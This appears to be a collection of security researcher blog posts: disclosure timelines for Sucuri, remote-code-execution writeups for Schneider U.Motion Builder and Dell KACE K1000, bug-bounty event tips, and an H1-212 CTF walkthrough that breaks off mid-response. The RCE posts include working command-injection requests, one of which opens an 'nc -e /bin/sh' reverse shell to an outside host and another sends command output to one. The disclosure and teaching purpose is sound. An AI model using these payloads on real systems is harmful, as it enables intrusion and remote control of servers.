  1. You could deliver the certificate chain containing only your CA, Intermediates and server certificate via a separate file (or as part of your PHP file) to the customer and do the verification of the server certificate within PHP, i.e. using PHP’s openssl_x509_parse().
  2. You could add a custom method on the customer-side script to verify a signature delivered with the payload sent from monitor2. As soon as the signature does not match, you could easily discard the payload before calling eval(). The signature to be used must be - of course - cryptographically secure by design.
  3. You could also encrypt the payload to be sent to the customer site using public-private key crypto on your side and decrypt it using the public key on the client side (rather than encoding it using base64). Should also be doable in pure PHP.

2017-11-29 to 2018-05-16

Sucuri went silent for half a year, where I’ve tried to contact them through HackerOne and directly via email. During that period I’ve also requested mediation through HackerOne.

2018-06-07

Suddenly out of the blue Sucuri told me that they have a fix ready for testing.

2018-06-21

Sucuri rewards the minimum bounty of 250 USD because of:

  1. A successful exploitation only works if a malicious actor uses network-level attacks (resulting in MITM) against the hosting server (or any of the intermediary hops to it) to impersonate our API. While in theory possible, this would require a lot of efforts for very little results (in term of the amount of sites affected at once versus the capacity required to conduct the attack). The fact we use anycast also doesn’t guarantee a BGP hijacking attack would be successful.
  2. The server-side scanner file contains a unique hash for every single site, which is an information the attacker would also need in order to perform any kind of attack against our customers.

2018-07-18

Sucuri adds an additional 500 USD to the bounty amount because they apparently misunderstood the signature validation point.

2018-09-15

I’ve requested to publicly disclose this issue because it was of so low severity for Sucuri, they shouldn’t have a problem with publicly disclosing this issue.

2018-10-12

A couple of days right before the scheduled disclosure date: Sucuri reopens the report and changes the report status to Informative without any further clarification. No further reply on any channel from Sucuri. That’s where they went silent for the second time.

2018-11-23

I’ve followed up with HackerOne about the whole story and they literally tried everything to resolve this issue by contacting Sucuri directly. HackerOne told me that Sucuri will close their program and the reason for the status change was to address some information which they feel is sensitive.

HackerOne closes the program at their request on 2018-12-15. HackerOne even made them aware of different tools to censor the report, but Sucuri did not react anymore (again).

2019-01-02

Agreed with HackerOne about taking the last resort disclosure option, and giving Sucuri another 180 days of additional time to respond. They never responded.

2019-06-13 to 2019-06-19

I’ve sent a couple of more emails directly to Sucuri (where they used to respond to) to make them aware of this blog post, but again: no answer at all.

2019-06-20

Public disclosure in the interest of the general public according to HackerOne’s last resort option.

About HackerOne’s Last Resort Option

I have tried to disclose this issue several times through HackerOne, but unfortunately Sucuri wasn’t willing to provide any disclosure timeline (have you read the mentioned blog article?) - in fact they did not even respond anymore in the end (not even via email) - which is why I took the last resort option after consulting with HackerOne and as per their guidelines:

If 180 days have elapsed with the Security Team being unable or unwilling to provide a vulnerability disclosure timeline, the contents of the Report may be publicly disclosed by the Finder. We believe transparency is in the public’s best interest in these extreme cases.

Since this is about an RCE affecting potentially all of Sucuri’s customers who are using the server-side security scanner, and since there was no public or customer statement by Sucuri (at least that I am aware of) I think the general public deserves to know about this flaw.

CVE-2018-7841: Schneider Electric U.Motion Builder Remote Code Execution 0-day

13 May 2019 at 00:00

I came across an unauthenticated Remote Code Execution vulnerability (called CVE-2018-7841) on an IoT device which was apparently using a component provided by Schneider Electric called U.Motion Builder.

While I’ve found it using my usual BurpSuite foo, I later noticed that there is already a public advisory about a very similar looking issue published by ZDI named Schneider Electric U.Motion Builder track_import_export SQL Injection Remote Code Execution Vulnerability (ZDI-17-378) aka CVE-2018-7765).

However, the ZDI advisory does only list a brief summary of the issue:

The specific flaw exists within processing of track_import_export.php, which is exposed on the web service with no authentication. The underlying SQLite database query is subject to SQL injection on the object_id input parameter when the export operation is chosen on the applet call. A remote attacker can leverage this vulnerability to execute arbitrary commands against the database.

So I had a closer look at the source code and stumbled upon a bypass to CVE-2018-7765 which was previously (incompletely) fixed by Schneider Electric in version 1.3.4 of U.Motion Builder.

As of today the issue is still unfixed and it won’t be fixed at all in the future, since the product has been retired on 12 March 2019 as a result of my report!

The (Incomplete) Fix

U.Motion 1.3.4 contains the vulnerable file /smartdomuspad/modules/reporting/track_import_export.php in which the application constructs a SQlite query called $where based on the concatenated object_id, which can be supplied either via GET or POST:

switch ($op) {
    case "export":
[...]
        $where = "";
[...]
        if (strcmp($period, ""))
            $where .= "PERIOD ='" . dpadfunctions::string_encode_for_SQLite(strtoupper($period)) . "' AND ";
        if (!empty($date_from))
            $where .= "TIMESTAMP >= '" . strtotime($date_from . " 0:00:00") . "' AND ";
        if (!empty($date_to))
            $where .= "TIMESTAMP <= '" . strtotime($date_to . " 23:59:59") . "' AND ";
        if (!empty($object_id))
            $where .= "OBJECT_ID='" . dpadfunctions::string_encode_for_SQLite($object_id) . "' AND ";
        $where .= "1 ";
[...]

You can see that object_id is first parsed by the string_encode_for_SQLite method, which does nothing more than stripping out a few otherwise unreadable characters (see dpadfunctions.class.php):

function string_encode_for_SQLite( $string ) {
        $string = str_replace( chr(1), "", $string );
        $string = str_replace( chr(2), "", $string );
        $string = str_replace( chr(3), "", $string );
        $string = str_replace( chr(4), "", $string );
        $string = str_replace( chr(5), "", $string );
        $string = str_replace( chr(6), "", $string );
        $string = str_replace( chr(7), "", $string );
        $string = str_replace( chr(8), "", $string );
        $string = str_replace( chr(9), "", $string );
        $string = str_replace( chr(10), "[CRLF]", $string );
        $string = str_replace( chr(11), "", $string );
        $string = str_replace( chr(12), "", $string );
        $string = str_replace( chr(13), "", $string );
        $num = str_replace( ",",".", $string );
        if ( is_numeric( $num ) ) {
            $string = $num;
        }
        else {
            $string = str_replace( "'", "''", $string );
            $string = str_replace( ",","[COMMA]", $string );
        }
        return $string;

$query is afterwards used in call to $dbClient->query():

[...]
$query = "SELECT COUNT(ID) AS COUNTER FROM DPADD_TRACK_DATA WHERE $where";
$counter_retrieve_result = $dbClient->query($query,$counter_retrieve_result_id,_DPAD_DB_SOCKETPORT_DOMUSPADTRACK);
[...]

The query() method can be found in dpaddbclient_NoDbManager_sqlite.class.php:

function query( $query, &$result_set_id, $sDB = null ) {
        $this->setDB( $sDB );
        define( "_DPAD_LOCAL_BACKSLASHED_QUOTE", "[QUOTEwithBACKSLASH]" );
        $query = str_replace("\\"", _DPAD_LOCAL_BACKSLASHED_QUOTE, $query);
        $query = str_replace("\"", "\\"", $query);
        $query = str_replace("$", "\$", $query);
        $query = str_replace( _DPAD_LOCAL_BACKSLASHED_QUOTE, "\\\\"", $query);
        $query_array = explode(" ", trim($query) );
        switch ( strtolower( $query_array[0] ) ) {
        case "insert":
            $query = $query . ";" . "SELECT last_insert_rowid();";
            break;
        case "select":
        default:
            break;
        } $result_set_id = null;
        $sqlite_cmd = _DPAD_ABSOLUTE_PATH_SQLITE_EXECUTABLE . " -header -separator '~' " . $this->getDBPath() . " \"" . $query . "\"";
        $result = exec( $sqlite_cmd, $output, $return_var );
[...]

Here you can see that the query string (which contains object_id) is fed through a bunch of str_replace calls with the intention to filter out dangerous characters such as $ for Unix command substitutions, and by the end of the snippet, you can actually see that another string $sqlite_cmd is concatenated with the previously build $query string and finally passed to an PHP exec() call.

The Exploit

So apparently Schneider Electric tried to fix the previously reported vulnerability by the following line:

$query = str_replace("$", "\$", $query);

As you might already guess, just filtering out $ is not enough to prevent a command injection into an exec() call. So in order to bypass the str_replace fix, you could simply use the backtick operator like in the following exemplary request:

POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
Content-Type: application/x-www-form-urlencoded
Content-Length: 86

op=export&language=english&interval=1&object_id=`nc -e /bin/sh www.rcesecurity.com 53`

resulting in a nice reverse shell:

A Few Words about the Disclosure Process

I have contacted Schneider Electric for the first time on the 15th November 2018. At this point their vulnerability reporting form wasn’t working at all throwing some errors. So I’ve tried to contact them over twitter (both via a public tweet and via DM) and at the very same time I did also mention that their reporting form does not work at all. Although I haven’t received any response at all, the form was at some point fixed without letting me know . So I’ve sent over all the details of the vulnerability and informed them about my 45-days disclosure policy starting from mind November. From this day the communication with their CERT went quite smoothly and I’ve agreed on extending the disclosure date to 120 days to give them more time to fix the issue. In the end the entire product was retired on 12 March 2019, which is the reason why I have delayed this disclosure by two more months.

Dell KACE K1000 Remote Code Execution - the Story of Bug K1-18652

9 April 2019 at 00:00

This is the story of an unauthenticated RCE affecting one of Dropbox’s in scope vendors during last year’s H1-3120 event. It’s one of my more recon-intensive, yet simple, vulnerabilities, and it (probably) helped me to become MVH by the end of the day ;-).

TL;DR It’s all about an undisclosed but fixed bug in the KACE Systems Management Appliance internally tracked by the ID K1-18652 which allows an unauthenticated attacker to execute arbitrary code on the appliance. Since the main purpose of the appliance is to manage client endpoints - and you are able to deploy software packages to clients - I theoretically achieved RCE on all of the vendor’s clients. It turns out that Dell (the software is now maintained by Quest) have silently fixed this vulnerability with the release of version 6.4 SP3 (6.4.120822).

Recon is Key!

While doing recon for the in-scope assets during H1-3120, I came across an administrative panel of what looked like being a Dell Kace K1000 Administrator Interface:

While gathering some background information about this “Dell Kace K1000” system, I came across the very same software now being distributed by a company called “Quest Software Inc”, which was previously owned by Dell.

Interestingly, Quest does also offer a free trial of the KACE® Systems Management Appliance appliance. Unfortunately, the free trial only covers the latest version of the appliance (this is at the time of this post v9.0.270), which also looks completely different:

However, the version I’ve found on the target was 6.3.113397 according to the very chatty web application:

X-DellKACE-Appliance: k1000
X-DellKACE-Host: redacted.com
X-DellKACE-Version: 6.3.113397
X-KBOX-WebServer: redacted.com
X-KBOX-Version: 6.3.113397

So there are at least 3 major versions between what I’ve found and what the current version is. Even trying to social engineer the Quest support to provide me with an older version did not work - apparently, I’m not a good social engineer ;-)

Recon is Key!!

At first I thought that both versions aren’t comparable at all, because codebases usually change heavily between multiple major versions, but I still decided to give it a try. I’ve set up a local testing environment with the latest version to poke around with it and understand what it is about. TBH at that point, I had very small expectations to find anything in the new version that can be applied to the old version. Apparently, I was wrong.

Recon is Key !!!11

While having a look at the source code of the appliance, I’ve stumbled upon a naughty little file called /service/krashrpt.php which is reachable without any authentication and which sole purpose is to handle crash dump files.

When reviewing the source code, I’ve found a quite interesting reference to a bug called K1-18652, which apparently was filed to prevent a path traversal issue through the parameters kuid and name ( $values is basically a reference to all parameters supplied either via GET or POST):

try {
    // K1-18652 make sure we escape names so we don't get extra path characters to do path traversal
    $kuid = basename($values['kuid']);
    $name = basename($values['name']);
} catch( Exception $e ) {
    KBLog( "Missing URL param: " . $e->getMessage() );
    exit();
}

Later kuid and name are used to construct a zip file name:

$tmpFnBase = "krash_{$name}_{$kuid}";
$tmpDir = tempnam( KB_UPLOAD_DIR, $tmpFnBase );
unlink( $tmpDir );
$zipFn = $tmpDir . ".zip";

However, K1-18652 does not only introduce the basename call to prevent the path traversal, but also two escapeshellarg calls to prevent any arbitrary command injection through the $tmpDir and $zipFn strings:

// unzip the archive to a tmpDir, and delete the .zip file
// K1-18652 Escape the shell arguments to avoid remote execution from inputs
exec( "/usr/local/bin/unzip -d " . escapeshellarg($tmpDir) . " " . escapeshellarg($zipFn));
unlink( $zipFn );

Although escapeshellarg does not fully prevent command injections I haven’t found any working way to exploit it on the most recent version of K1000.

Using a new K1000 to exploit an old K1000

So K1-18652 addresses two potentially severe issues which have been fixed in the recent version. Out of pure curiosity, I decided to blindly try a common RCE payload against the old K1000 version assuming that the escapeshellarg calls haven’t been implemented for the kuid and name parameters in the older version at all:

POST /service/krashrpt.php HTTP/1.1
Host: redacted.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: kboxid=r8cnb8r3otq27vd14j7e0ahj24
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

kuid=`id | nc www.rcesecurity.com 53`

And guess what happened:

Awesome! This could afterwards be used to execute arbitrary code on all connected client systems because K1000 is an asset management system:

The KACE Systems Management Appliance (SMA) helps you accomplish these goals by automating complex administrative tasks and modernizing your unified endpoint management approach. This makes it possible for you to inventory all hardware and software, patch mission-critical applications and OS, reduce the risk of breach, and assure software license compliance. So you’re able to reduce systems management complexity and safeguard your vulnerable endpoints.

Source: Quest

Comment from the Vendor

Unfortunately, since I haven’t found any public references to the bug, the fix or an existing exploit, I’ve contacted Quest to get more details about the vulnerability and their security coordination process. Quest later told me that the fix was shipped by Dell with version 6.4 SP3 (6.4.120822), but that neither a public advisory has been published nor an explicit customer statement was made - so in other words: it was silently fixed.

#BugBountyTip

If you find a random software in use, consider investing the time to set up an instance of the software locally and try to understand how it works and search for bugs. This works for me every, single time.

Thanks, Dropbox for the nice bounty!

H1-3120: MVH! (H1 Event Guide for Newbies)

29 June 2018 at 00:00

Here’s another late post about my coolest bug bounty achievement so far! In May I’ve participated in HackerOne’s H1-3120 in the beautiful city of Amsterdam with the goal to break some Dropbox stuff. It was a really tough target, but I still managed to find some juicy bugs! According to d0nutptr of the Dropbox team, these caused some internal troubles leading to some serious phone calls ;-). In the end I was awarded three out of the four titles of the evening: “The Exalted”, “The Assassin” and finally also the ”Most Valuable Hacker” (MVH)!

However, I do not only want to talk about my achievements (there are a lot of pictures available on the here), but rather give some tips for all those upcoming event first timers ;-).

You (usually) get to know the targets right before the event!

Typically, HackerOne provides you with a near-final scope a few days before the event. This means you will have some time to explore the target and already collect bugs before the actual event kicks off. My advice here is: hack as much as you can because of one awesome thing: Bounties will be split during the first 30 minutes! This means if 5 people submit the same vulnerability during the first 30 minutes, the bounty for the vulnerability will be equally split amongst everyone, i.e.: 1000 USD/5 people = 200 USD for everyone.

Do your recon prior to the event!

I usually do a lot of recon before I actually start hacking. While this already leads to bugs for myself, it creates another big advantage: I always find low-hanging or seemingly unexploitable things and while working with other hackers during the event, somebody might ask you if there is any endpoint vulnerable to an open redirect or whatever, because he/she actually needs it to complete an exploit chain. Why not collect some additional love here and provide them with your seemingly unexploitable stuff? They might help you out afterwards too!

Late-double-check your findings the night before the actual event!

Bad luck might hit you! It is possible that you find stuff, which the program fixes right before the event kicks off. Trust me, while working on bugs for H1-415, I found some really awesome bugs during the preparation phase for the event. However, while I was (more or less accidentally) checking one of my bugs the night before the event, I noticed that it has been fixed. From this point, I told myself to always late-double-check my bugs to avoid getting N/As.

Try to prevent Frans Rosen from submitting / submit your bugs using bountyplz!

While it is always a good idea to prevent Frans from using his machine to submit his findings, you should also use his tool “bountyplz” to mass-submit findings especially if you have so many vulnerabilities on your waiting list, that it could be difficult to submit them all during the 30 minutes bounty split time. Since the H1 reporting form isn’t really made for quick submissions, it will help you getting your reports in before the deadline ends.

Collaborate during the event!**

Yes, it is still a competition, but don’t underestimate it! You will learn that everybody has his/her own specialties that can help exploiting bugs! On this way I have learned about Corb3nik’s really awesome JavaScript skills!

Thank you very much HackerOne and Dropbox for organizing such an awesome event! I’m already looking forward to all the future events :-)

H1-415: Hacking My Way Into the Top 4 of the Day

3 May 2018 at 00:00

I’ve always wanted to visit San Francisco! So I was really happy about an email from HackerOne inviting me to this beautiful city in April. But they did not cover all the costs for my international flights and the hotel room just for my personal city trip - they had something really nasty in mind: hacking Oath! If you don’t know Oath - they own brands like Yahoo, AOL, Tumblr, Techcrunch amongst others.

So while a free trip to San Francisco by itself is already an awesome thing, HackerOne did a great job in organizing a live hacking event which currently has no equal…and this does not only apply to the logo ;-)

The event itself took place in a beautiful coworking space in downtown San Francisco on the 14th floor with a nice view over San Francisco, including a tasty breakfast. This breakfast was indeed needed for the upcoming 9 hours of hacking kung-fu! The hacking was finally kicked off at 10:00 with a pretty nice scope to hack on. However, the scope itself has already been announced a couple of days prior to the event itself, so that everyone had the chance to prepare some nice vulnerabilities and bring them to the event. The only tricky thing was to verify the vulnerabilities again before submitting them during the event to make sure they haven’t been fixed by a last-minute patch ;-)

As part of this preparation I found almost 20 vulnerabilities ranging from Cross-Site Scripting up to some nice SQL Injection chains. The first 60 minutes of the event were covered by a blackout period where everybody had the chance to submit their findings without having to fear duplicates! The good thing about this approach was that duplicates have been paid out by splitting the bounty amount amongst all hackers that reported the same vulnerability. Luckily my personal dupe count was just at 3 resulting in my smallest bounty of USD 50. After this blackout period all duplicates were handled as usual - first come, first serve.

After 9 hours of continuous hacking my personal day ended with 25 vulnerability submissions, a maximum single payout of 5.000 USD and an overall rank of 4 on the event leaderboard:

At the end of the day Oath paid an overall of 400.000 USD (yes it’s 6 digits!) to all participating hackers, which has been the biggest event so far!

However, there was more to this event than just getting bounties. During the event I met so many talented hackers like @yaworsk, @arneswinnen, @securinti, @smiegles, @SebMorin1, @thedawgyg, @seanmeals, @Corb3nik, @Rhynorater , @prebenve@ngalongc, the famous @filedescriptor and many, many more which is by far more valuable than any bounty! Thank you so much for being part of this community!

On this way I would like to thank HackerOne and specifically Ted Kramer for organizing a really awesome event and Ben Sadeghipour for giving me the chance to show my skills! A special thanks is going to the whole HackerOne triaging team for triaging hundreds of vulnerability reports and paying them out right on stage - just another day at work, right ;-) ?

It was a truly amazing experience - see you on the next event!

H1-212 CTF: Breaking the Teapot!

22 November 2017 at 00:00

With the h1-212 CTF, HackerOne offered a really cool chance to win a visit to New York City to hack on some exclusive targets in a top secret location. To be honest, I’m not a CTF guy at all, but this incentive caught my attention. The only thing one had to do in order to participate was: solve the CTF challenge, document the hacky way into it and hope to get selected in the end.  So I decided to participate and try to get onto the plane - unfortunately my write-up wasn’t selected in the end, however I still like to share it for learning purposes :-)

Thanks to Jobert and the HackerOne team for creating a fun challenge!

Introduction

The CTF was introduced by just a few lines of story:

An engineer of acme.org launched a new server for a new admin panel at http://104.236.20.43/. He is completely confident that the server can’t be hacked. He added a tripwire that notifies him when the flag file is read. He also noticed that the default Apache page is still there, but according to him that’s intentional and doesn’t hurt anyone. Your goal? Read the flag!

While this sounds like a very self-confident engineer, there is one big hint in these few lines to actually get a first step into the door: acme.org.

The first visit to the given URL at http://104.236.20.43/, showed nothing more than the “default Apache” page:

Identify All the Hints!

While brute-forcing a default Apache2 installation doesn’t make much sense (except if you want to rediscover /icons ;-) ), it was immediately clear that a different approach is required to solve this challenge.

What has shown to be quite fruity in my bug bounty career is changing the host header in order to reach other virtual hosts configured on the same web server. In this case, it took me only a single try to find out that the “new admin panel” of “acme.org” is actually located at “admin.acme.org” - so by changing the host header from “104.236.20.43” to “admin.acme.org”:

GET / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

The Apache default page was suddenly gone and the web server returned a different response:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 06:16:41 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: admin=no
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

As you might have noticed already, there is one line in this response that looks ultimately suspicious: The web application issued a “Set-Cookie” directive setting the value of the “admin” cookie to “no”.

Building a Bridge Into the Teapot

While it’s always good to have a healthy portion of self-confidence, the engineer of acme.org seemed to have a bit too much of it when it comes to “the server can’t be hacked”.

Since cookies are actually user-controllable, imagine what would happen if the “admin” cookie value is changed to “yes”?

GET / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

Surprise, the web application responded differently with an HTTP 405 like the following:

HTTP/1.1 405 Method Not Allowed
Date: Wed, 15 Nov 2017 06:30:21 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

This again means that the HTTP verb needs to be changed. However when changed to HTTP POST:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

The web application again responded differently with an HTTP 406 this time:

HTTP/1.1 406 Not Acceptable
Date: Wed, 15 Nov 2017 06:35:31 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

While googling around for this unusual status code, I came across the following description by W3:

10.4.7 406 Not Acceptable

The resource identified by the request is only capable of generating response entities which have content characteristics not acceptable according to the accept headers sent in the request.

Unless it was a HEAD request, the response SHOULD include an entity containing a list of available entity characteristics and location(s) from which the user or user agent can choose the one most appropriate. The entity format is specified by the media type given in the Content-Type header field. Depending upon the format and the capabilities of the user agent, selection of the most appropriate choice MAY be performed automatically. However, this specification does not define any standard for such automatic selection.

Jumping into the Teapot

So it seems to be about a missing Content-Type declaration here. After a “Content-Type” header of “application/json” was added to the request:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json

A third HTTP response code - HTTP 418 aka “the teapot” was returned:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 06:40:18 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 37
Connection: close
Content-Type: application/json

{"error":{"body":"unable to decode"}}

Now it was pretty obvious that it’s about a JSON-based endpoint. By supplying an empty JSON body as part of the HTTP POST request:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 2

{}

The application responded with the missing parameter name:

HTTP/1.1 418 I'm a teapot
Date: Wed, 15 Nov 2017 06:43:58 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 31
Connection: close
Content-Type: application/json

{"error":{"domain":"required"}}

Given the parameter name, this somehow smelled a bit like a nifty Server-Side Request Forgery challenge.

Short Excursion to SSRF

What I usually do as some sort of precaution in such scenarios is having a separate domain like “rcesec.com”,  whose authoritative NS servers point to an IP/server under my control in order to be able to spoof DNS requests of all kinds. So i.e. “ns1.rcesec.com” and “ns2.rcesec.com” are the authoritative NS servers for “rcesec.com”, which both point to the IP address of one of my servers:

On the nameserver side, I do like to use the really awesome tool called “dnschef” by iphelix, which is capable of spoofing all kinds of DNS records like A, AAAA, MX, CNAME or NS to whatever value you like. I usually do point all A records to the loopback address 127.0.0.1 to discover some interesting data:

Breaking the Teapot

Going on with the exploitation and adding a random sub-domain under my domain “rcesec.com”:

POST / HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes
Content-Type: application/json
Content-Length: 30

{"domain":"h1-212.rcesec.com"}

resulted in the following response:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:09:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 26
Connection: close
Content-Type: text/html; charset=UTF-8

{"next":"\/read.php?id=0"}

Funny side note here: I accidentally bypassed another input filtering which required the subdomain part of the input to the domain parameter to include the string “212”, but I only noticed this by the end of the challenge :-D

So it seems that the application accepted the value and just responded with a reference to a new PHP file (Remember: PHP seems to be Jobert Abma’s favorite programming language ;-) ). When the proposed request was issued against the read.php file:

GET /read.php?id=0 HTTP/1.1
Host: admin.acme.org
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: admin=yes

The application responded with a huge base64-encoded string:

HTTP/1.1 200 OK
Date: Wed, 15 Nov 2017 07:11:31 GMT
Server: Apache/2.4.18 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 15109
Connection: close
Content-Type: text/html; charset=UTF-8

{"data":"CjwhRE9DVFlQRSBodG1sIFBVQkxJQyAiLS8vVzNDLy9EVEQgWEhUTUwgMS4wIFRyYW5zaXRpb25hbC8vRU4iICJodHRwOi8vd3d3LnczLm9yZy9UUi94aHRtbDEvRFREL3hodG1sMS10cmFuc2l0aW9uYWwuZHRkIj4KPGh0bWwgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkveGh0bWwiPgogIDwhLS0KICAgIE1vZGlmaWVkIGZyb20gdGhlIERlYmlhbiBvcmlnaW5hbCBmb3IgVWJ1bnR1CiAgICBMYXN0IHVwZGF0ZWQ6IDIwMTQtMDMtMTkKICAgIFNlZTogaHR0cHM6Ly9sYXVuY2hwYWQubmV0L2J1Z3MvMTI4ODY5MAogIC0tPgogIDxoZWFkPgogICAgPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9VVRGLTgiIC8+CiAgICA8dGl0bGU+QXBhY2hlMiBVYnVudHUgRGVmYXVsdCBQYWdlOiBJdCB3b3JrczwvdGl0bGU+CiAgICA8c3R5bGUgdHlwZT0idGV4dC9jc3MiIG1lZGlhPSJzY3JlZW4iPgogICogewogICAgbWFyZ2luOiAwcHggMHB4IDBweCAwcHg7CiAgICBwYWRkaW5nOiAwcHggMHB4IDBweCAwcHg7CiAgfQoKICBib2R5LCBodG1sIHsKICAgIHBhZGRpbmc6IDNweCAzcHggM3B4IDNweDsKCiAgICBiYWNrZ3JvdW5kLWNvbG9yOiAjRDhEQkUyOwoKICAgIGZvbnQtZmFtaWx5OiBWZXJkYW5hLCBzYW5zLXNlcmlmOwogICAgZm9udC1zaXplOiAxMXB0OwogICAgdGV4dC1hbGlnbjogY2VudGVyOwogIH0KCiAgZGl2Lm1haW5fcGFnZSB7CiAgICBwb3NpdGlvbjogcmVsYXRpdmU7CiAgICBkaXNwbGF5OiB0YWJsZTsKCiAgICB3aWR0aDogODAwcHg7CgogICAgbWFyZ2luLWJvdHRvbTogM3B4OwogICAgbWFyZ2luLWxlZnQ6IGF1dG87CiAgICBtYXJnaW4tcmlnaHQ6IGF1dG87CiAgICBwYWRkaW5nOiAwcHggMHB4IDBweCAwcHg7CgogICAgYm9yZGVyLXdpZHRoOiAycHg7CiAgICBib3JkZXItY29sb3I6ICMyMTI3Mzg7CiAgICBib3JkZXItc3R5bGU6IHNvbGlkOwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGRkZGRkY7CgogICAgdGV4dC1hbGlnbjogY2VudGVyOwogIH0KCiAgZGl2LnBhZ2VfaGVhZGVyIHsKICAgIGhlaWdodDogOTlweDsKICAgIHdpZHRoOiAxMDAlOwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGNUY2Rjc7CiAgfQoKICBkaXYucGFnZV9oZWFkZXIgc3BhbiB7CiAgICBtYXJnaW46IDE1cHggMHB4IDBweCA1MHB4OwoKICAgIGZvbnQtc2l6ZTogMTgwJTsKICAgIGZvbnQtd2VpZ2h0OiBib2xkOwogIH0KCiAgZGl2LnBhZ2VfaGVhZGVyIGltZyB7CiAgICBtYXJnaW46IDNweCAwcHggMHB4IDQwcHg7CgogICAgYm9yZGVyOiAwcHggMHB4IDBweDsKICB9CgogIGRpdi50YWJsZV9vZl9jb250ZW50cyB7CiAgICBjbGVhcjogbGVmdDsKCiAgICBtaW4td2lkdGg6IDIwMHB4OwoKICAgIG1hcmdpbjogM3B4IDNweCAzcHggM3B4OwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGRkZGRkY7CgogICAgdGV4dC1hbGlnbjogbGVmdDsKICB9CgogIGRpdi50YWJsZV9vZl9jb250ZW50c19pdGVtIHsKICAgIGNsZWFyOiBsZWZ0OwoKICAgIHdpZHRoOiAxMDAlOwoKICAgIG1hcmdpbjogNHB4IDBweCAwcHggMHB4OwoKICAgIGJhY2tncm91bmQtY29sb3I6ICNGRkZGRkY7CgogICAgY29sb3I6ICMwMDAwMDA7CiAgICB0ZXh0LWFsaWduOiBsZWZ0OwogIH0KCiAgZGl2LnRhYmxlX29mX2NvbnRlbnRzX2l0ZW0gYSB7CiAgICBtYXJnaW46IDZweCAwcHggMHB4IDZweDsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb24gewogICAgbWFyZ2luOiAzcHggM3B4IDNweCAzcHg7CgogICAgYmFja2dyb3VuZC1jb2xvcjogI0ZGRkZGRjsKCiAgICB0ZXh0LWFsaWduOiBsZWZ0OwogIH0KCiAgZGl2LmNvbnRlbnRfc2VjdGlvbl90ZXh0IHsKICAgIHBhZGRpbmc6IDRweCA4cHggNHB4IDhweDsKCiAgICBjb2xvcjogIzAwMDAwMDsKICAgIGZvbnQtc2l6ZTogMTAwJTsKICB9CgogIGRpdi5jb250ZW50X3NlY3Rpb25fdGV4dCBwcmUgewogICAgbWFyZ2luOiA4cHggMHB4